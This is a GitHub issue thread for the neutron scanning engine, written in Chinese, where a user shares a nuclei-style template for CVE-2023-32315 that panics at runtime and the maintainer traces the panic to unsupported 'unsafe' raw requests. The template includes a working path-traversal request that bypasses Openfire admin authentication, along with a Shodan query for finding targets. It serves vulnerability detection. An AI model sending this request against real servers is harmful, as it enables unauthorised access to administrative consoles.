search

chainreactors / neutron

nano nuclei engine. no side effect.
https://chainreactors.github.io/wiki/libs/neutron/
41 stars 9 forks source link

有个poc在Compile的时候没有问题,但是Excute的时候会直接panic #7

Closed lovelyjuice closed 6 days ago

lovelyjuice commented 3 weeks ago 
id: CVE-2023-32315

info:
  name: Administration Console Authentication Bypass in Openfire Console
  author: vsh00t
  severity: high
  description: |
    Openfire is an XMPP server licensed under the Open Source Apache License. Openfire's administrative console, a web-based application, was found to be vulnerable to a path traversal attack via the setup environment. This permitted an unauthenticated user to use the unauthenticated Openfire Setup Environment in an already configured Openfire environment to access restricted pages in the Openfire Admin Console reserved for administrative users. This vulnerability affects all versions of Openfire that have been released since April 2015, starting with version 3.10.0.
  remediation: |
    The problem has been patched in Openfire release 4.7.5 and 4.6.8, and further improvements will be included in the yet-to-be released first version on the 4.8 branch (which is expected to be version 4.8.0). Users are advised to upgrade. If an Openfire upgrade isn’t available for a specific release, or isn’t quickly actionable, users may see the linked github advisory (GHSA-gw42-f939-fhvm) for mitigation advice.
  reference:
    - https://github.com/advisories/GHSA-gw42-f939-fhvm
    - https://nvd.nist.gov/vuln/detail/CVE-2023-32315
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
    cvss-score: 8.6
    cve-id: CVE-2023-32315
    cwe-id: CWE-22
  metadata:
    max-request: 1
    verified: true
    shodan-query: title:"openfire"
  tags: cve,cve2023,auth-bypass,openfire,console

http:
  - raw:
      - |+
        GET /setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}

    unsafe: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'class="head-num"'
        condition: and

      - type: status
        status:
          - 200

要不是我打了个断点,还真不知道是这个poc自身的兼容性问题。所以验证脚本cmd\validate\validate.go能否提前发现这种Execute报错的poc?我的想法是提供一个本地URL,然后调用Excute去测试这个URL,但是后来一想它直接panic了,也没法打印出是否成功/失败。

M09Ic commented 1 week ago

我检查了一下, 是因为目前还不支持unsafe的原因

在运行时的报错没办法被validate时校验出来,但是我可以提供更多的debug日志来定位bug

M09Ic commented 1 week ago

我添加了关于unsafe的校验, 在compile阶段就会报错